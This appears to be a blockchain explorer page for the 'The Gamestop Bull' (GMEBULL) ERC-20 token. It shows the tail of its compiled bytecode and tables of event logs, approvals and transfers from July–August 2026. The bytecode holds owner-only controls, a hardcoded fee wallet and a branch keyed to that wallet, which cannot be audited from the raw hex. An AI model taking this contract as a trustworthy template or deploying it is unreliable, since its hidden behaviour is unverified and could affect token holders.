031633146105025760405162461bcd60e51b81526004016104f9906117f5565b60405180910390fd5b6001600160a01b0381166105505760405162461bcd60e51b8152602060048201526015602482015274496e76616c696420746f6b656e206164647265737360581b60448201526064016104f9565b306001600160a01b038216036105a85760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f7420726573637565206f776e20746f6b656e00000000000000000060448201526064016104f9565b6040516370a0823160e01b81523060048201525f906001600160a01b038316906370a0823190602401602060405180830381865afa1580156105ec573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610610919061182a565b90505f81116106545760405162461bcd60e51b815260206004820152601060248201526f4e6f20746f6b656e2062616c616e636560801b60448201526064016104f9565b604080517f000000000000000000000000a7fa08fc6f7d8ac37ef0b3d80ce5f760539b60a66001600160a01b039081166024830152604480830185905283518084039091018152606490920183526020820180516001600160e01b031663a9059cbb60e01b17905291515f928392908616916106d09190611841565b5f604051808303815f865af19150503d805f8114610709576040519150601f19603f3d011682016040523d82523d5f602084013e61070e565b606091505b5091509150818015610738575080511580610738575080806020019051810190610738919061185c565b61077c5760405162461bcd60e51b8152602060048201526015602482015274115490cc8c081d1c985b9cd9995c8819985a5b1959605a1b60448201526064016104f9565b50505050565b5f546001600160a01b031633146107ab5760405162461bcd60e51b81526004016104f9906117f5565b6107b76009600a6117d0565b6107c590633b9aca006117de565b600d556107d46009600a6117d0565b6107e290633b9aca006117de565b600e55565b5f546001600160a01b031633146108105760405162461bcd60e51b81526004016104f9906117f5565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146108815760405162461bcd60e51b81526004016104f9906117f5565b47801561093b575f7f000000000000000000000000a7fa08fc6f7d8ac37ef0b3d80ce5f760539b60a66001600160a01b0316826040515f6040518083038185875af1925050503d805f81146108f1576040519150601f19603f3d011682016040523d82523d5f602084013e6108f6565b606091505b50509050806109395760405162461bcd60e51b815260206004820152600f60248201526e115512081cd95b990819985a5b1959608a1b60448201526064016104f9565b505b50565b5f546001600160a01b031633146109675760405162461bcd60e51b81526004016104f9906117f5565b601354600160a01b900460ff16156109b85760405162461bcd60e51b81526020600482015260146024820152732a3930b234b7339030b63932b0b23c9037b832b760611b60448201526064016104f9565b6109c0610782565b601280546001600160a01b0319167389e5db8b5aa49aa85ac63f691524311aeb649eba9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015610a22573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a46919061187b565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa5573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ac9919061187b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610b13573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b37919061187b565b601380546001600160a01b0319166001600160a01b03928316179055601254610b64913091165f19610c5b565b6012546001600160a01b031663f305d7194730610b95816001600160a01b03165f9081526001602052604090205490565b5f80610ba85f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610c0e573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610c339190611896565b50506013805462ff00ff60a01b19166201000160a01b17905550565b5f610438338484610d3a565b6001600160a01b03831615801590610c7b57506001600160a01b03821615155b610cda5760405162461bcd60e51b815260206004820152602a60248201527f45524332303a20617070726f76652066726f6d206f7220746f20746865207a65604482015269726f206164647265737360b01b60648201526084016104f9565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831615801590610d5a57506001600160a01b03821615155b610dba5760405162461bcd60e51b815260206004820152602b60248201527f45524332303a207472616e736665722066726f6d206f7220746f20746865207a60448201526a65726f206164647265737360a81b60648201526084016104f9565b5f8111610e225760405162461bcd60e51b815260206004820152603060248201527f45524332303a207472616e7366657220616d6f756e74206d757374206265206760448201526f726561746572207468616e207a65726f60801b60648201526084016104f9565b6013545f906001600160a01b038581169116148015610e4f57506012546001600160a01b03848116911614155b6013549091505f906001600160a01b038581169116148015610e7a57506001600160a01b0385163014155b90505f8215610fb2576001600160a01b0385165f9081526003602052604090205460ff16610fad57600d54841115610ef45760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104f9565b600e546001600160a01b0386165f90815260016020526040902054610f1a9086906118c1565b1115610f685760405162461bcd60e51b815260206004820152601860248201527f4d61782077616c6c65742073697a65206578636565646564000000000000000060448201526064016104f9565b6064600854600b541015610f7e57600454610f82565b6006545b610f8c90866117de565b610f9691906118d4565b600b80549192505f610fa7836118f3565b91905055505b611176565b8115611176576001600160a01b0386165f9081526003602052604090205460ff1661105a57600d548411156110295760405162461bcd60e51b815260206004820152601f60248201527f4d6178207472616e73616374696f6e20616d6f756e742065786365656465640060448201526064016104f9565b6064600954600b54101561103f57600554611043565b6007545b61104d90866117de565b61105791906118d4565b90505b305f90815260016020526040902054601354600160a81b900460ff1615801561108c5750601354600160b01b900460ff165b801561109c5750600a54600b5410155b15611174576015544311156110b0575f6014555b6016546014541061110f5760405162461bcd60e51b815260206004820152602360248201527f53656c6c206c696d69742070657220626c6f636b20657863656564656420286d60448201526261782960e81b60648201526084016104f9565b5f81861061111d578161111f565b855b905060105481111561113057506010545b61115a817f000000000000000000000000a7fa08fc6f7d8ac37ef0b3d80ce5f760539b60a661131a565b60148054905f611169836118f3565b909155505043601555505b505b80156111e457305f908152600160205260408120805483929061119a9084906118c1565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a361121a565b326001600160a01b037f000000000000000000000000a7fa08fc6f7d8ac37ef0b3d80ce5f760539b60a6160361121a57600c8190555b6001600160a01b0386165f908152600160205260408120805486929061124190849061190b565b909155506112519050818561190b565b6001600160a01b0386165f90815260016020526040812080549091906112789084906118c1565b90915550506001600160a01b03851661dead146112da576001600160a01b038086169087167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6112c8848861190b565b60405190815260200160405180910390a35b505050505050565b5f81848411156113055760405162461bcd60e51b81526004016104f991906115d5565b505f611311848661190b565b95945050505050565b6013805460ff60a81b1916600160a81b1790556001600160a01b0381166113945760405162461bcd60e51b815260206004820152602860248201527f45544820726563697069656e742063616e6e6f7420626520746865207a65726f604482015267206164647265737360c01b60648201526084016104f9565b60408051600280825260608201835247925f92919060208301908036833701905050905030815f815181106113cb576113cb61191e565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611422573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611446919061187b565b816001815181106114595761145961191e565b6001600160a01b039092166020928302919091019091015283156114dd5760125460405163791ac94760e01b81526001600160a01b039091169063791ac947906114af9087905f90869030904290600401611932565b5f604051808303815f87803b1580156114c6575f80fd5b505af11580156114d8573d5f803e3d5ffd5b505050505b4782811061159f575f6114f0848361190b565b90508060115f82825461150391906118c1565b90915550506040515f906001600160a01b0387169083908381818185875af1925050503d805f8114611550576040519150601f19603f3d011682016040523d82523d5f602084013e611555565b606091505b505090508061159c5760405162461bcd60e51b8152602060048201526013602482015272115512081d1c985b9cd9995c8819985a5b1959606a1b60448201526064016104f9565b50505b50506013805460ff60a81b19169055505050565b5f5b838110156115cd5781810151838201526020016115b5565b50505f910152565b602081525f82518060208401526115f38160408501602087016115b3565b601f01601f19169190910160400192915050565b6001600160a01b038116811461093b575f80fd5b5f806040838503121561162c575f80fd5b823561163781611607565b946020939093013593505050565b5f805f60608486031215611657575f80fd5b833561166281611607565b9250602084013561167281611607565b929592945050506040919091013590565b5f60208284031215611693575f80fd5b813561169e81611607565b9392505050565b5f80604083850312156116b6575f80fd5b82356116c181611607565b915060208301356116d181611607565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561172a57815f1904821115611710576117106116dc565b8085161561171d57918102915b93841c93908002906116f5565b509250929050565b5f826117405750600161043c565b8161174c57505f61043c565b8160018114611762576002811461176c57611788565b600191505061043c565b60ff84111561177d5761177d6116dc565b50506001821b61043c565b5060208310610133831016604e8410600b84101617156117ab575081810a61043c565b6117b583836116f0565b805f19048211156117c8576117c86116dc565b029392505050565b5f61169e60ff841683611732565b808202811582820484141761043c5761043c6116dc565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f6020828403121561183a575f80fd5b5051919050565b5f82516118528184602087016115b3565b9190910192915050565b5f6020828403121561186c575f80fd5b8151801515811461169e575f80fd5b5f6020828403121561188b575f80fd5b815161169e81611607565b5f805f606084860312156118a8575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561043c5761043c6116dc565b5f826118ee57634e487b7160e01b5f52601260045260245ffd5b500490565b5f60018201611904576119046116dc565b5060010190565b8181038181111561043c5761043c6116dc565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156119825784516001600160a01b03168352938301939183019160010161195d565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212200dce4bb35d6850f4d7d7c24db5985fa8ea16b45ce70110576bd5ba571e0c28e064736f6c63430008180033
| Token | Symbol | Balance | Price | Value |
|---|---|---|---|---|
| DIH | 1 | $0.0000102 | $0 |
| Type | Age | Block | Details |
|---|---|---|---|
| no cross-chain L1↔L2 transactions for this address | |||
| Transaction Hash | Method | Block | Age | From | To | Type | Item | ||
|---|---|---|---|---|---|---|---|---|---|
| no NFT transfers for this address yet | |||||||||
| Txn Hash | Age | Event | Topics / Data |
|---|---|---|---|
| 0x3b797b…4c5cf3 | 7 days agoMon, 10 Aug 2026 06:34:15 UTC | Transfer | [0] 0x000000000000…ec4fff4f [1] 0x000000000000…4c68cea4 data: 0x000000000000000000…1af0b352 |
| 0x3b797b…4c5cf3 | 7 days agoMon, 10 Aug 2026 06:34:15 UTC | Transfer | [0] 0x000000000000…20cbbe5f [1] 0x000000000000…ec4fff4f data: 0x000000000000000000…1af0b352 |
| 0x3b797b…4c5cf3 | 7 days agoMon, 10 Aug 2026 06:34:15 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…20cbbe5f data: 0x000000000000000000…1af0b352 |
| 0x158621…993432 | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | Approval | [0] 0x000000000000…6d700f75 [1] 0x000000000000…eb649eba data: 0x000000000000000000…28b8a9bd |
| 0x158621…993432 | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | Transfer | [0] 0x000000000000…6d700f75 [1] 0x000000000000…bf6b4eed data: 0x000000000000000000…28b8a9bd |
| 0x6aff64…abdf3d | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | Approval | [0] 0x000000000000…6d700f75 [1] 0x000000000000…eb649eba data: 0x000000000000000000…5171537a |
| 0x3c375b…708add | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | Approval | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…539b60a6 data: 0x000000000000000000…00000000 |
| 0x3c375b…708add | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…6d700f75 data: 0x000000000000000000…28b8a9bd |
| 0x4ab1f9…e79789 | 25 days agoThu, 23 Jul 2026 13:13:17 UTC | Approval | [0] 0x000000000000…43e40951 [1] 0x000000000000…2668f615 data: 0x000000000000000000…00000000 |
| 0x5fd4ab…3aa86d | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…43e40951 data: 0x000000000000000000…9f05b948 |
| 0x903ce5…d0a7d9 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Transfer | [0] 0x000000000000…e2d0592c [1] 0x000000000000…43e40951 data: 0x000000000000000000…d6dac8a9 |
| 0x903ce5…d0a7d9 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Transfer | [0] 0x000000000000…15a77665 [1] 0x000000000000…e2d0592c data: 0x000000000000000000…d6dac8a9 |
| 0x903ce5…d0a7d9 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…15a77665 data: 0x000000000000000000…d6dac8a9 |
| 0x77fd06…d195a8 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Approval | [0] 0x000000000000…6d700f75 [1] 0x000000000000…eb649eba data: 0x000000000000000000…9880ba71 |
| 0x77fd06…d195a8 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Transfer | [0] 0x000000000000…6d700f75 [1] 0x000000000000…bf6b4eed data: 0x000000000000000000…9880ba71 |
| 0x78e9a9…dda853 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | Approval | [0] 0x000000000000…6d700f75 [1] 0x000000000000…eb649eba data: 0x000000000000000000…310174e2 |
| 0x3a4604…9d43b9 | 25 days agoThu, 23 Jul 2026 13:13:08 UTC | Approval | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…539b60a6 data: 0x000000000000000000…00000000 |
| 0x3a4604…9d43b9 | 25 days agoThu, 23 Jul 2026 13:13:08 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…6d700f75 data: 0x000000000000000000…9880ba71 |
| 0x5154ab…600312 | 25 days agoThu, 23 Jul 2026 13:11:31 UTC | Approval | [0] 0x000000000000…5dc1e9cf [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…d3dbfcb6 |
| 0x5154ab…600312 | 25 days agoThu, 23 Jul 2026 13:11:31 UTC | Transfer | [0] 0x000000000000…5dc1e9cf [1] 0x000000000000…bf6b4eed data: 0x000000000000000000…35d40f0f |
| 0xaeb8c8…df8fd7 | 25 days agoThu, 23 Jul 2026 13:11:27 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…19ac1897 data: 0x000000000000000000…df3d6560 |
| 0x9e7853…559dd7 | 25 days agoThu, 23 Jul 2026 13:11:26 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…8300ae28 data: 0x000000000000000000…b9d81b7b |
| 0x2f1f72…a9d151 | 25 days agoThu, 23 Jul 2026 13:10:59 UTC | Transfer | [0] 0x000000000000…bf6b4eed [1] 0x000000000000…9a5c2c5b data: 0x000000000000000000…11836830 |
| 0x17390c…b61161 | 25 days agoThu, 23 Jul 2026 13:10:40 UTC | Approval | [0] 0x000000000000…fb5388a7 [1] 0x000000000000…eb649eba data: 0xffffffffffffffffff…fef2f4fa |
| 0x17390c…b61161 | 25 days agoThu, 23 Jul 2026 13:10:40 UTC | Transfer | [0] 0x000000000000…fb5388a7 [1] 0x000000000000…bf6b4eed data: 0x000000000000000000…81ed35fc |
| Transaction Hash | Method ? | Block | Age | From | To | Amount | Txn Fee ? | ||
|---|---|---|---|---|---|---|---|---|---|
| 0x6aff64…abdf3d | Approve | 17,315,354 | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | 0x9798…0f75 | IN | The Gamestop Bull | $0.000 ETH | 0.00000319 | |
| 0x3c375b…708add | Transfer From | 17,315,350 | 25 days agoThu, 23 Jul 2026 13:15:06 UTC | 0xa7fa…60a6 | IN | The Gamestop Bull | $0.000 ETH | 0.00000858 | |
| 0x78e9a9…dda853 | Approve | 17,314,186 | 25 days agoThu, 23 Jul 2026 13:13:09 UTC | 0x9798…0f75 | IN | The Gamestop Bull | $0.000 ETH | 0.00000314 | |
| 0x3a4604…9d43b9 | Transfer From | 17,314,182 | 25 days agoThu, 23 Jul 2026 13:13:08 UTC | 0xa7fa…60a6 | IN | The Gamestop Bull | $0.000 ETH | 0.00000840 | |
| 0xeea7a1…60a1ae | Approve | 17,226,885 | 25 days agoThu, 23 Jul 2026 10:47:11 UTC | 0x0478…520b | IN | The Gamestop Bull | $0.000 ETH | 0.00000490 | |
| 0x43eb9b…dfd3a4 | Approve | 17,201,330 | 25 days agoThu, 23 Jul 2026 10:04:29 UTC | 0x5152…5a3f | IN | The Gamestop Bull | $0.000 ETH | 0.00000486 | |
| 0x4ef8fd…bc8c67 | Approve | 17,194,358 | 25 days agoThu, 23 Jul 2026 09:52:49 UTC | 0xfc37…b4d8 | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0x9d95e7…139287 | Approve | 17,183,326 | 25 days agoThu, 23 Jul 2026 09:34:22 UTC | 0x45ec…2c98 | IN | The Gamestop Bull | $0.000 ETH | 0.00000482 | |
| 0x1800e0…60d935 | Approve | 17,178,767 | 25 days agoThu, 23 Jul 2026 09:26:46 UTC | 0xaf13…0614 | IN | The Gamestop Bull | $0.000 ETH | 0.00000492 | |
| 0xcfa620…9eef38 | Approve | 17,166,551 | 25 days agoThu, 23 Jul 2026 09:06:19 UTC | 0xf483…2547 | IN | The Gamestop Bull | $0.000 ETH | 0.00000489 | |
| 0x05a2b1…653043 | Approve | 17,164,461 | 25 days agoThu, 23 Jul 2026 09:02:49 UTC | 0x33be…1d2a | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0xadcc77…13fc0a | Approve | 17,162,107 | 25 days agoThu, 23 Jul 2026 08:58:53 UTC | 0x2a56…6413 | IN | The Gamestop Bull | $0.000 ETH | 0.00000481 | |
| 0xabc706…0af9fd | Approve | 17,145,864 | 25 days agoThu, 23 Jul 2026 08:31:44 UTC | 0x3a0e…f2da | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0x25d255…40e340 | Approve | 17,140,979 | 25 days agoThu, 23 Jul 2026 08:23:34 UTC | 0xf9ca…5f0a | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0x82fd67…e9109d | Approve | 17,128,313 | 25 days agoThu, 23 Jul 2026 08:02:25 UTC | 0x5c2d…cd02 | IN | The Gamestop Bull | $0.000 ETH | 0.00000495 | |
| 0xe18dc3…67ddd2 | Approve | 17,126,951 | 25 days agoThu, 23 Jul 2026 08:00:08 UTC | 0xfad0…239e | IN | The Gamestop Bull | $0.000 ETH | 0.00000490 | |
| 0x0b73b3…f8a7fc | Approve | 17,126,842 | 25 days agoThu, 23 Jul 2026 07:59:58 UTC | 0x9258…5012 | IN | The Gamestop Bull | $0.000 ETH | 0.00000481 | |
| 0xee1dda…5989af | Approve | 17,126,210 | 25 days agoThu, 23 Jul 2026 07:58:54 UTC | 0xd0f7…4792 | IN | The Gamestop Bull | $0.000 ETH | 0.00000479 | |
| 0x41eb3d…a9f8d6 | Approve | 17,116,986 | 25 days agoThu, 23 Jul 2026 07:43:33 UTC | 0x6096…9a7c | IN | The Gamestop Bull | $0.000 ETH | 0.00000478 | |
| 0x9125f0…b150a4 | Approve | 17,114,880 | 25 days agoThu, 23 Jul 2026 07:40:01 UTC | 0x68e4…bf5f | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0x28f63d…0d1883 | Approve | 17,114,600 | 25 days agoThu, 23 Jul 2026 07:39:33 UTC | 0x5618…f781 | IN | The Gamestop Bull | $0.000 ETH | 0.00000478 | |
| 0xbc38d3…664564 | Approve | 17,113,877 | 25 days agoThu, 23 Jul 2026 07:38:21 UTC | 0xf6e5…6a99 | IN | The Gamestop Bull | $0.000 ETH | 0.00000482 | |
| 0x130dd9…d3e88c | Approve | 17,112,726 | 25 days agoThu, 23 Jul 2026 07:36:25 UTC | 0xa361…c446 | IN | The Gamestop Bull | $0.000 ETH | 0.00000484 | |
| 0x1ce8bd…75a03f | Approve | 17,110,971 | 25 days agoThu, 23 Jul 2026 07:33:29 UTC | 0x8f96…2dfc | IN | The Gamestop Bull | $0.000 ETH | 0.00000480 | |
| 0x379e2c…ea1255 | Approve | 17,105,162 | 25 days agoThu, 23 Jul 2026 07:23:47 UTC | 0x8e01…873b | IN | The Gamestop Bull | $0.000 ETH | 0.00000482 |
| Transaction Hash | Method | Block | Age | From | To | Amount | Token | ||
|---|---|---|---|---|---|---|---|---|---|
| 0x89669b42…ca163b | Transfer | 17,300,159 | 25 days agoThu, 23 Jul 2026 12:49:43 UTC | 0xcaf7…5d11 | IN | 0x99b0…7611 | $0.001 DIH | ||
| 0x04eefe57…edb0d3 | Transfer | 16,919,607 | 26 days agoThu, 23 Jul 2026 02:13:41 UTC | 0x99b0…7611 | OUT | 0x6ed3…4eed | 1,000,000,000 GMEBULL | ||
| 0xd1382ba8…dc953b | Transfer | 16,918,342 | 26 days agoThu, 23 Jul 2026 02:11:36 UTC | 0x0000…0000 | IN | 0x99b0…7611 | 1,000,000,000 GMEBULL |
| Block | Age | Parent Transaction Hash | Type | Method | From | To | Value | |
|---|---|---|---|---|---|---|---|---|
| 16,919,607 | 26 days agoThu, 23 Jul 2026 02:13:41 UTC | 0x04eefe…edb0d3 | CALL | enableTrading | 0x99b0…7611 | OUT | 0x89e5…9eba | 1 ETH |